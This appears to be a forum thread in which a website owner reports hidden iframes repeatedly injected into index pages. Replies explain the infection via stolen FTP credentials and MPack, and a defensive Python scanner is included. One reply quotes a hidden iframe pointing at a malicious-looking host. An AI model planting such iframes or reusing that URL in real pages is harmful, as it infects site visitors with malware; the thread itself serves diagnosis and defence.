So a while ago, on a random day, my website suddenly appeared with a blank page. I replaced all my files on the server and it was working again. However, this constantly happens over time, maybe 1-2 times a week. Something is adding this kind of code to my index files:

<iframe src="http://x0v.ru:8080/index.php" width=153 height=138 style="visibility: hidden"></iframe>

This causes visitors to my site to download a virus. This is very frustrating; any help would be great on this issue! I have scanned my backup files with Kaspersky and they seem clean. I thought it was my VPS, but then I switched to another host and the same thing happens!
And it spreads and it spreads... I will post this once again (whether anyone listens to the new guy or not is up to them):

"How does this hacking take place: This hacking does not take place through any PHP application vulnerability, kernel bug, Apache bug, or cPanel or Plesk bug.

How it's done: The hacker(s) are setting up innocent-looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like MPack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, Firefox and Opera). The visitor is unaware that they may have a keylogger that sends the person's passwords etc. to the hacker(s) and moves on. After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers' infection site, where the person's computer will be injected and infected. And so the cycle continues.

Solution: Change the FTP password and it will usually stop. The only reason it wouldn't is if a keylogger is on your personal computer, and since you change the password using the same computer, you just gave the passwords back to the hackers again. Just changing the password is not a complete solution, but it is the first step. What's next: your password is leaked, which means your computer is sending out the passwords, so I would suggest you do a clean format first and then install any antivirus or anti-spyware which you think could block it. But the best solution is to clean format the computer.

If the innocent visitor has an FTP or root password for any internet sites, the hackers use a program that goes to the person's site(s) and instantly adds the hidden iframe to every index-type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the FTP or root passwords to log in.

And since they have at least your account FTP pass, whatever permissions your folders and files are set to makes no difference."
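A defensive check for the injection described in this thread, added here as an example and not part of any poster's message: it walks a copy of the web root and reports index-type pages that contain a hidden iframe loading from a foreign host. The host names, the list of index file names and the sample page are constructed assumptions.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that keep an iframe out of the visitor's sight.
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
# "Index type" pages, the files the thread says get modified (assumed name list).
INDEX_NAME = re.compile(r"^(index|default|home)\.(php|html?)$", re.I)
# Constructed sample modelled on the injected tag quoted in the thread.
SAMPLE = ('<html><body>Welcome</body></html>\n<iframe src="http://injected.example:8080/'
          'index.php" width=153 height=138 style="visibility: hidden"></iframe>')

class IframeFinder(HTMLParser):
    """Collects the src of every iframe whose inline style hides it."""
    def __init__(self):
        super().__init__()
        self.hidden_srcs = []

    def handle_starttag(self, tag, attrs):
        attr = {name: value or "" for name, value in attrs}
        if tag == "iframe" and HIDDEN_STYLE.search(attr.get("style", "")):
            self.hidden_srcs.append(attr.get("src", ""))

def find_hidden_iframes(text, own_hosts=()):
    """Return srcs of hidden iframes that load from a host not in own_hosts."""
    finder = IframeFinder()
    finder.feed(text)
    finder.close()
    hosts = {h.lower() for h in own_hosts}
    return [src for src in finder.hidden_srcs
            if (urlparse(src).hostname or "") not in hosts | {""}]

def scan_webroot(root, own_hosts=()):
    """Map each index-type file under root to the foreign hidden iframes in it."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in filter(INDEX_NAME.match, files):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read(), own_hosts)
            if hits:
                report[path] = hits
    return report

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE, own_hosts=["www.example.com"]))
```

Running `scan_webroot` on a schedule against the live files shows when the tag reappears, which helps tell whether a password change actually cut off the access.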
Okay, well, I changed my pass but it is still occurring. I have just completed reformatting, so I will try changing it once again... if this doesn't work, does anyone else have an idea?
Had you cleaned it out prior? It's possible that your host is infected. This has been the case lately.

^ top secret information

edit: may also want to try KeyScrambler-Personal, found over at CNET. I would provide a link, but apparently I'm not allowed.
Oh, I've read another thread about that. But I think the hacker had my password to my main email, since I saw a weird email as the secondary email to mine... I reformatted, changed my secondary email, changed my passwords... hopefully this is done.